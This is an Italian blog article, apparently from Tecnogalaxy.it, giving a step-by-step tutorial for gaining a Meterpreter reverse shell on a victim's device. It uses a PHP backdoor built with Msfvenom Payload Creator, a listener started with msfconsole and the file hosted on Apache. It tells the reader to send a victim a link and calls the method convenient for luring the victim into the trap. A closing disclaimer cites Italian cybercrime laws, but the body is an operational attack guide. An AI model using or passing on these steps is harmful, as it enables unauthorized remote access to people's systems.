Ciao ragazzi, in questo articolo parlaremo di come hackerare un dispositivo con la backdoor php-meterpreter-staged-reverse-tcp-443.php; essa fa parte della serie di backdoor che ormai analizziamo da molto tempo, messe a disposizione dal tool Msfvenom Payload Creator, incluso nella piattaforma di Kali Linux. Per svolgere un attacco con questo tipo di backdoor, innanzitutto, dovremo startare il programma andando sul percorso applicazioni>strumenti di exploiting>MPC;

 

 

 

 

 

 

una volta che avremo davanti la console possiamo procedere con il primo comando ovvero:

/usr/bin/msfpc verbose loop “indirizzo ip locale”

 

 

 

 

 

 

il quale creerà tutti i possibili file necessari all’attacco nella cartella home;

 

 

 

 

 

 

a noi ovviamente ne servirà solamente uno, per adesso. Ricordo che per ottenere l’indirizzo IP in locale bisogna aprire un nuovo terminale e digitare il comando “ifconfig”.

 

 

 

 

 

 

A questo punto procediamo con il secondo comando:

msfconsole -q -r ‘/root/php-meterpreter-staged-reverse-tcp-443-php.rc’

il quale aprirà la console di Metasploit Framework e metterà il terminale in ascolto.

 

 

 

 

 

 

 

Quindi andiamo nella cartella home e trasferiamo il file php-meterpreter-staged-reverse-tcp-443.php nel percorso computer>var>www>html;

 

 

 

 

 

 

fatto ciò possiamo aprire un ulteriore terminale ed eseguire il comando “service apache2 start”

 

 

 

 

 

 

Ora possiamo quindi inviare alla vittima un link con la seguente struttura:

“indirizzo ip locale”/php-meterpreter-staged-reverse-tcp-443.php

Dove sostituiremo “indirizzo ip locale” con il nostro indirizzo IP ricavato in precedenza mediante il comando “ifconfig”.

 

 

 

 

 

 

In questo caso basterà semplicemente far cliccare la vittima sul link e NON SARÀ NECESSARIO farle scaricare file per poi successivamente aprirli; per questo ritengo che questa backdoor sia una delle più convenienti da utilizzare, proprio perchè il processo è meno laborioso e soprattutto non ci vorrà nulla per condurre la vittima nel tranello. Ritornando a noi, dopo aver cliccato sul link si aprirà una sessione tra il nostro PC e il dispositivo sotto attacco.

 

 

 

 

 

 

 

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un’ incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).

 

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.